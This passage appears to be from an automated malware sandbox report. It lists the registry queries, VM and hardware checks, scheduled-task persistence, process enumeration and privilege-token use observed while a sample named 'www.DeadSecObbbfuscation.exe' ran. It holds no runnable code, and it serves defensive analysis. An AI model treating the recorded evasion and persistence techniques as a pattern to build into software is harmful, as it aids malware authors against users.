Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1720461025" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
